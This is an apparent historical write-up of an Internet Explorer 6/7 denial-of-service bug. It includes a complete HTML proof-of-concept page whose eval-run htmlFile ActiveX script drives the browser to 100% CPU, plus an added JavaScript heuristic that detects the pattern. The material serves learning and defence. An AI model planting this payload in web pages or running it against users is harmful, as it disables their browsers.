Running a specific two-line script through eval, but not directly, causes IE to consume 100% CPU indefinitely. The code creates an htmlFile ActiveX object and calls createElement with an OBJECT tag whose DATA attribute points to about:blank. Running it normally does nothing; running it via eval triggers the denial of service.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>DOS_htmlFile_BlankObjectEval_StressCPU - DoS - 100% Busy Process</title></head>
<body>
<font size="2" face="Tahoma">
<b>IE6/IE7 DoS --> This simple Script will not crash IE but it will take 100% CPU Task/Time generating a Denial of Service of the Browser.</b><br /><br />
The funny thing is that this code should be executed <u>using the eval method</u>. If we run it normally, nothing happens. Another thing to
keep in mind is that the OBJECT DATA (URL) <u>should point to about:blank</u>.
</font><br /><br />
<center>
<input type="button" value="Run Script with eval (100% Processor)" onclick="eval(str_busyProcess)">
<br /><br />
<input type="button" value="Run Script normally (Nothing Happens)" onclick="busyProcess()">
</center>
<script language="JavaScript">
// Direct call: the same two statements run as ordinary code (nothing happens).
function busyProcess()
{
  myAx = new ActiveXObject('htmlFile');
  myAx.createElement('<OBJECT TYPE="text/html" DATA="about:blank" WIDTH="100" HEIGHT="100">');
}
// The same two statements carried as a string; the first button passes it to eval.
str_busyProcess = 'myAx = new ActiveXObject(\'htmlFile\');' +
                  'myAx.createElement(\'<OBJECT TYPE="text/html" DATA="about:blank" WIDTH="100" HEIGHT="100">\');';
</script>
</body>
</html>
The eval path appears to trigger a different code path in IE’s script engine for handling the createElement call inside the htmlFile context. When executed through eval, something causes an infinite loop in the rendering or object initialization cycle. The direct function call doesn’t reproduce the issue, suggesting the bug is in how eval-executed code interacts with the htmlFile’s internal state machine.
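An added example, not part of the original page or of any vendor code: a static triage heuristic that separates the eval-delivered form of this script from the direct call, since only the former is described above as causing the hang. The function names, the result labels and the two sample inputs are constructed for illustration.

```javascript
// Added example: heuristic triage for the htmlFile + blank OBJECT pattern.
// Limitation: comments and regex literals in the input are not parsed.

// Return decoded string literals, merging 'a' + 'b' concatenations into one entry.
function joinedStringLiterals(js) {
  const out = [];
  let join = false;
  for (let i = 0; i < js.length; ) {
    const q = js[i];
    if (q !== "'" && q !== '"') { i++; continue; }
    let text = '';
    for (i++; i < js.length && js[i] !== q; i++) {
      if (js[i] === '\\') i++;            // drop the backslash, keep the escaped char
      text += js[i] ?? '';
    }
    i++;                                  // step past the closing quote
    if (join) out[out.length - 1] += text; else out.push(text);
    const plus = /^\s*\+\s*(?=['"])/.exec(js.slice(i));
    join = plus !== null;
    if (plus) i += plus[0].length;        // land on the next opening quote
  }
  return out;
}

// True when code creates an htmlFile object and an OBJECT element with DATA=about:blank.
function isHtmlFileBlankObject(code) {
  return /ActiveXObject\s*\(\s*['"]htmlfile['"]/i.test(code) &&
    /createElement\s*\(\s*['"]<object\b[^>]*\bdata\s*=\s*["']?about:blank/i.test(code);
}

// 'eval-path': pattern is carried inside a string and an eval call is present.
function classify(js) {
  const carriedAsString = joinedStringLiterals(js).some(isHtmlFileBlankObject);
  if (carriedAsString && /\beval\s*\(/.test(js)) return 'eval-path';
  if (carriedAsString || isHtmlFileBlankObject(js)) return 'pattern-without-eval';
  return 'clean';
}

// Constructed inputs, adapted from the page's script block and button handlers.
const EVAL_SAMPLE = String.raw`
str_busyProcess = 'myAx = new ActiveXObject(\'htmlFile\');' +
  'myAx.createElement(\'<OBJECT TYPE="text/html" DATA="about:blank" WIDTH="100" HEIGHT="100">\');';
eval(str_busyProcess);`;
const DIRECT_SAMPLE = `
function busyProcess() {
  myAx = new ActiveXObject('htmlFile');
  myAx.createElement('<OBJECT TYPE="text/html" DATA="about:blank" WIDTH="100" HEIGHT="100">');
}
busyProcess();`;

console.log(classify(EVAL_SAMPLE), classify(DIRECT_SAMPLE));
```

The caller is expected to pass script bodies and inline handler code as one string; the check says nothing about whether a given browser build is affected.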
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.